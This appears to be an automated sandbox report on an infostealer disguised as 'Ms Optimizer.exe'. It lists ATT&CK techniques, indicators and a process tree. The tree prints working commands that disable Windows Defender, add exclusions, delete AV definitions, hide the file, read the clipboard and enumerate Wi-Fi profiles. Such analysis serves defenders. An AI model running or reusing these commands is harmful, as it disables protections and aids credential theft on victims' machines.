0ff7a5b5bedeac0e43dfc0779ba19d96357871631043d5b9243c24bc743c9029

Analysis

max time kernel
421s
max time network
661s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01-01-2025 15:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ms Optimizer.exe
Size

30.0MB
MD5

58b7ee8f89ce798c07c7585d41d4b293
SHA1

24adc394aa3de92844bba052c25866ce01bdca41
SHA256

ed386a79e63463746364bd5217a6ae32bd27961ba9701fa50a55ec6745c1558e
SHA512

cdc3673977266c904fbf7ae2aba6dfa9850cda82abbb6465db19d49406a8f2c5b1dca9c9c567f6666d83cef82e3a310f6af5af09f846cbb4e369bea1f2e784d5
SSDEEP

196608:HDD+kd1wfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWY:j5QIHL7HmBYXrYoaUNP

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1084	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5024	powershell.exe
3992	powershell.exe
3652	powershell.exe
4660	powershell.exe
4072	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Ms Optimizer.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4620	cmd.exe
1596	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4628	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe
4752	Ms Optimizer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2600	tasklist.exe
3172	tasklist.exe
2436	tasklist.exe
4576	tasklist.exe
1088	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
880	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004515c-21.dat	upx
behavioral1/memory/4752-24-0x00007FFB58AF0000-0x00007FFB59155000-memory.dmp	upx
behavioral1/files/0x002800000004510c-27.dat	upx
behavioral1/files/0x0028000000045149-31.dat	upx
behavioral1/memory/4752-30-0x00007FFB686B0000-0x00007FFB686D7000-memory.dmp	upx
behavioral1/files/0x0028000000045141-48.dat	upx
behavioral1/files/0x0028000000045140-47.dat	upx
behavioral1/files/0x002800000004513f-46.dat	upx
behavioral1/files/0x002800000004513e-45.dat	upx
behavioral1/files/0x002800000004510f-44.dat	upx
behavioral1/files/0x002800000004510e-43.dat	upx
behavioral1/files/0x002800000004510d-42.dat	upx
behavioral1/files/0x0028000000045109-41.dat	upx
behavioral1/files/0x0028000000045166-40.dat	upx
behavioral1/files/0x0028000000045165-39.dat	upx
behavioral1/files/0x0028000000045164-38.dat	upx
behavioral1/files/0x002800000004514a-35.dat	upx
behavioral1/files/0x0028000000045148-34.dat	upx
behavioral1/memory/4752-32-0x00007FFB71730000-0x00007FFB7173F000-memory.dmp	upx
behavioral1/memory/4752-54-0x00007FFB683F0000-0x00007FFB6841B000-memory.dmp	upx
behavioral1/memory/4752-56-0x00007FFB67E20000-0x00007FFB67E39000-memory.dmp	upx
behavioral1/memory/4752-58-0x00007FFB67DF0000-0x00007FFB67E15000-memory.dmp	upx
behavioral1/memory/4752-60-0x00007FFB58970000-0x00007FFB58AEF000-memory.dmp	upx
behavioral1/memory/4752-62-0x00007FFB67DD0000-0x00007FFB67DE9000-memory.dmp	upx
behavioral1/memory/4752-64-0x00007FFB68CD0000-0x00007FFB68CDD000-memory.dmp	upx
behavioral1/memory/4752-66-0x00007FFB67D90000-0x00007FFB67DC3000-memory.dmp	upx
behavioral1/memory/4752-71-0x00007FFB588A0000-0x00007FFB5896E000-memory.dmp	upx
behavioral1/memory/4752-70-0x00007FFB58AF0000-0x00007FFB59155000-memory.dmp	upx
behavioral1/memory/4752-76-0x00007FFB67D40000-0x00007FFB67D54000-memory.dmp	upx
behavioral1/memory/4752-80-0x00007FFB582A0000-0x00007FFB58353000-memory.dmp	upx
behavioral1/memory/4752-79-0x00007FFB686A0000-0x00007FFB686AD000-memory.dmp	upx
behavioral1/memory/4752-75-0x00007FFB686B0000-0x00007FFB686D7000-memory.dmp	upx
behavioral1/memory/4752-73-0x00007FFB58360000-0x00007FFB58893000-memory.dmp	upx
behavioral1/memory/4752-81-0x00007FFB67DF0000-0x00007FFB67E15000-memory.dmp	upx
behavioral1/memory/4752-83-0x00007FFB58970000-0x00007FFB58AEF000-memory.dmp	upx
behavioral1/memory/4752-116-0x00007FFB67D90000-0x00007FFB67DC3000-memory.dmp	upx
behavioral1/memory/4752-234-0x00007FFB588A0000-0x00007FFB5896E000-memory.dmp	upx
behavioral1/memory/4752-236-0x00007FFB58360000-0x00007FFB58893000-memory.dmp	upx
behavioral1/memory/4752-331-0x00007FFB582A0000-0x00007FFB58353000-memory.dmp	upx
behavioral1/memory/4752-340-0x00007FFB58AF0000-0x00007FFB59155000-memory.dmp	upx
behavioral1/memory/4752-349-0x00007FFB67D90000-0x00007FFB67DC3000-memory.dmp	upx
behavioral1/memory/4752-346-0x00007FFB58970000-0x00007FFB58AEF000-memory.dmp	upx
behavioral1/memory/4752-389-0x00007FFB582A0000-0x00007FFB58353000-memory.dmp	upx
behavioral1/memory/4752-386-0x00007FFB58360000-0x00007FFB58893000-memory.dmp	upx
behavioral1/memory/4752-399-0x00007FFB588A0000-0x00007FFB5896E000-memory.dmp	upx
behavioral1/memory/4752-398-0x00007FFB68CD0000-0x00007FFB68CDD000-memory.dmp	upx
behavioral1/memory/4752-397-0x00007FFB67DD0000-0x00007FFB67DE9000-memory.dmp	upx
behavioral1/memory/4752-396-0x00007FFB58970000-0x00007FFB58AEF000-memory.dmp	upx
behavioral1/memory/4752-395-0x00007FFB67DF0000-0x00007FFB67E15000-memory.dmp	upx
behavioral1/memory/4752-394-0x00007FFB67E20000-0x00007FFB67E39000-memory.dmp	upx
behavioral1/memory/4752-393-0x00007FFB683F0000-0x00007FFB6841B000-memory.dmp	upx
behavioral1/memory/4752-392-0x00007FFB71730000-0x00007FFB7173F000-memory.dmp	upx
behavioral1/memory/4752-391-0x00007FFB686B0000-0x00007FFB686D7000-memory.dmp	upx
behavioral1/memory/4752-390-0x00007FFB67D90000-0x00007FFB67DC3000-memory.dmp	upx
behavioral1/memory/4752-375-0x00007FFB58AF0000-0x00007FFB59155000-memory.dmp	upx
behavioral1/memory/4752-388-0x00007FFB686A0000-0x00007FFB686AD000-memory.dmp	upx
behavioral1/memory/4752-387-0x00007FFB67D40000-0x00007FFB67D54000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2300	cmd.exe
4348	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1512	cmd.exe
4896	netsh.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2564	WMIC.exe
4364	WMIC.exe
3300	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3140	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4348	PING.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
5024	powershell.exe
5024	powershell.exe
4628	WMIC.exe
4628	WMIC.exe
4628	WMIC.exe
4628	WMIC.exe
4660	powershell.exe
4660	powershell.exe
2564	WMIC.exe
2564	WMIC.exe
2564	WMIC.exe
2564	WMIC.exe
4364	WMIC.exe
4364	WMIC.exe
4364	WMIC.exe
4364	WMIC.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
2608	WMIC.exe
2608	WMIC.exe
2608	WMIC.exe
2608	WMIC.exe
1596	powershell.exe
1596	powershell.exe
1892	powershell.exe
1892	powershell.exe
1596	powershell.exe
1892	powershell.exe
3992	powershell.exe
3992	powershell.exe
1248	powershell.exe
1248	powershell.exe
1536	WMIC.exe
1536	WMIC.exe
1536	WMIC.exe
1536	WMIC.exe
3720	WMIC.exe
3720	WMIC.exe
3720	WMIC.exe
3720	WMIC.exe
424	WMIC.exe
424	WMIC.exe
424	WMIC.exe
424	WMIC.exe
3652	powershell.exe
3652	powershell.exe
3300	WMIC.exe
3300	WMIC.exe
3300	WMIC.exe
3300	WMIC.exe
420	powershell.exe
420	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	2600	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4628	WMIC.exe
Token: SeSecurityPrivilege	4628	WMIC.exe
Token: SeTakeOwnershipPrivilege	4628	WMIC.exe
Token: SeLoadDriverPrivilege	4628	WMIC.exe
Token: SeSystemProfilePrivilege	4628	WMIC.exe
Token: SeSystemtimePrivilege	4628	WMIC.exe
Token: SeProfSingleProcessPrivilege	4628	WMIC.exe
Token: SeIncBasePriorityPrivilege	4628	WMIC.exe
Token: SeCreatePagefilePrivilege	4628	WMIC.exe
Token: SeBackupPrivilege	4628	WMIC.exe
Token: SeRestorePrivilege	4628	WMIC.exe
Token: SeShutdownPrivilege	4628	WMIC.exe
Token: SeDebugPrivilege	4628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4628	WMIC.exe
Token: SeRemoteShutdownPrivilege	4628	WMIC.exe
Token: SeUndockPrivilege	4628	WMIC.exe
Token: SeManageVolumePrivilege	4628	WMIC.exe
Token: 33	4628	WMIC.exe
Token: 34	4628	WMIC.exe
Token: 35	4628	WMIC.exe
Token: 36	4628	WMIC.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeIncreaseQuotaPrivilege	4628	WMIC.exe
Token: SeSecurityPrivilege	4628	WMIC.exe
Token: SeTakeOwnershipPrivilege	4628	WMIC.exe
Token: SeLoadDriverPrivilege	4628	WMIC.exe
Token: SeSystemProfilePrivilege	4628	WMIC.exe
Token: SeSystemtimePrivilege	4628	WMIC.exe
Token: SeProfSingleProcessPrivilege	4628	WMIC.exe
Token: SeIncBasePriorityPrivilege	4628	WMIC.exe
Token: SeCreatePagefilePrivilege	4628	WMIC.exe
Token: SeBackupPrivilege	4628	WMIC.exe
Token: SeRestorePrivilege	4628	WMIC.exe
Token: SeShutdownPrivilege	4628	WMIC.exe
Token: SeDebugPrivilege	4628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4628	WMIC.exe
Token: SeRemoteShutdownPrivilege	4628	WMIC.exe
Token: SeUndockPrivilege	4628	WMIC.exe
Token: SeManageVolumePrivilege	4628	WMIC.exe
Token: 33	4628	WMIC.exe
Token: 34	4628	WMIC.exe
Token: 35	4628	WMIC.exe
Token: 36	4628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5024	powershell.exe
Token: SeSecurityPrivilege	5024	powershell.exe
Token: SeTakeOwnershipPrivilege	5024	powershell.exe
Token: SeLoadDriverPrivilege	5024	powershell.exe
Token: SeSystemProfilePrivilege	5024	powershell.exe
Token: SeSystemtimePrivilege	5024	powershell.exe
Token: SeProfSingleProcessPrivilege	5024	powershell.exe
Token: SeIncBasePriorityPrivilege	5024	powershell.exe
Token: SeCreatePagefilePrivilege	5024	powershell.exe
Token: SeBackupPrivilege	5024	powershell.exe
Token: SeRestorePrivilege	5024	powershell.exe
Token: SeShutdownPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeSystemEnvironmentPrivilege	5024	powershell.exe
Token: SeRemoteShutdownPrivilege	5024	powershell.exe
Token: SeUndockPrivilege	5024	powershell.exe
Token: SeManageVolumePrivilege	5024	powershell.exe
Token: 33	5024	powershell.exe
Token: 34	5024	powershell.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe
2864	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2864	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4404 wrote to memory of 4752	4404	Ms Optimizer.exe	81
PID 4404 wrote to memory of 4752	4404	Ms Optimizer.exe	81
PID 4752 wrote to memory of 4292	4752	Ms Optimizer.exe	82
PID 4752 wrote to memory of 4292	4752	Ms Optimizer.exe	82
PID 4752 wrote to memory of 3152	4752	Ms Optimizer.exe	83
PID 4752 wrote to memory of 3152	4752	Ms Optimizer.exe	83
PID 4752 wrote to memory of 4996	4752	Ms Optimizer.exe	84
PID 4752 wrote to memory of 4996	4752	Ms Optimizer.exe	84
PID 4752 wrote to memory of 4576	4752	Ms Optimizer.exe	87
PID 4752 wrote to memory of 4576	4752	Ms Optimizer.exe	87
PID 4752 wrote to memory of 4460	4752	Ms Optimizer.exe	90
PID 4752 wrote to memory of 4460	4752	Ms Optimizer.exe	90
PID 3152 wrote to memory of 5024	3152	cmd.exe	92
PID 3152 wrote to memory of 5024	3152	cmd.exe	92
PID 4576 wrote to memory of 2600	4576	cmd.exe	93
PID 4576 wrote to memory of 2600	4576	cmd.exe	93
PID 4460 wrote to memory of 4628	4460	cmd.exe	94
PID 4460 wrote to memory of 4628	4460	cmd.exe	94
PID 4996 wrote to memory of 4860	4996	cmd.exe	95
PID 4996 wrote to memory of 4860	4996	cmd.exe	95
PID 4292 wrote to memory of 4660	4292	cmd.exe	96
PID 4292 wrote to memory of 4660	4292	cmd.exe	96
PID 4752 wrote to memory of 1428	4752	Ms Optimizer.exe	99
PID 4752 wrote to memory of 1428	4752	Ms Optimizer.exe	99
PID 1428 wrote to memory of 3096	1428	cmd.exe	101
PID 1428 wrote to memory of 3096	1428	cmd.exe	101
PID 4752 wrote to memory of 3724	4752	Ms Optimizer.exe	102
PID 4752 wrote to memory of 3724	4752	Ms Optimizer.exe	102
PID 3724 wrote to memory of 2292	3724	cmd.exe	105
PID 3724 wrote to memory of 2292	3724	cmd.exe	105
PID 4752 wrote to memory of 320	4752	Ms Optimizer.exe	160
PID 4752 wrote to memory of 320	4752	Ms Optimizer.exe	160
PID 320 wrote to memory of 2564	320	cmd.exe	108
PID 320 wrote to memory of 2564	320	cmd.exe	108
PID 4752 wrote to memory of 4440	4752	Ms Optimizer.exe	109
PID 4752 wrote to memory of 4440	4752	Ms Optimizer.exe	109
PID 4440 wrote to memory of 4364	4440	cmd.exe	111
PID 4440 wrote to memory of 4364	4440	cmd.exe	111
PID 4752 wrote to memory of 880	4752	Ms Optimizer.exe	112
PID 4752 wrote to memory of 880	4752	Ms Optimizer.exe	112
PID 4752 wrote to memory of 3848	4752	Ms Optimizer.exe	113
PID 4752 wrote to memory of 3848	4752	Ms Optimizer.exe	113
PID 3152 wrote to memory of 1084	3152	cmd.exe	150
PID 3152 wrote to memory of 1084	3152	cmd.exe	150
PID 4752 wrote to memory of 1288	4752	Ms Optimizer.exe	117
PID 4752 wrote to memory of 1288	4752	Ms Optimizer.exe	117
PID 4752 wrote to memory of 4556	4752	Ms Optimizer.exe	118
PID 4752 wrote to memory of 4556	4752	Ms Optimizer.exe	118
PID 4556 wrote to memory of 3172	4556	cmd.exe	121
PID 4556 wrote to memory of 3172	4556	cmd.exe	121
PID 1288 wrote to memory of 2436	1288	cmd.exe	122
PID 1288 wrote to memory of 2436	1288	cmd.exe	122
PID 3848 wrote to memory of 4072	3848	cmd.exe	123
PID 3848 wrote to memory of 4072	3848	cmd.exe	123
PID 880 wrote to memory of 1144	880	cmd.exe	124
PID 880 wrote to memory of 1144	880	cmd.exe	124
PID 4752 wrote to memory of 1612	4752	Ms Optimizer.exe	125
PID 4752 wrote to memory of 1612	4752	Ms Optimizer.exe	125
PID 4752 wrote to memory of 4620	4752	Ms Optimizer.exe	127
PID 4752 wrote to memory of 4620	4752	Ms Optimizer.exe	127
PID 4752 wrote to memory of 4572	4752	Ms Optimizer.exe	129
PID 4752 wrote to memory of 4572	4752	Ms Optimizer.exe	129
PID 4752 wrote to memory of 2320	4752	Ms Optimizer.exe	131
PID 4752 wrote to memory of 2320	4752	Ms Optimizer.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1144	attrib.exe
2452	attrib.exe
320	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4404
- C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe
  "C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5024
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()"
      4⤵
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ms Optimizer.exe"
      4⤵
      Views/modifies file attributes
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4572
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2320
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1512
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5032
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3140
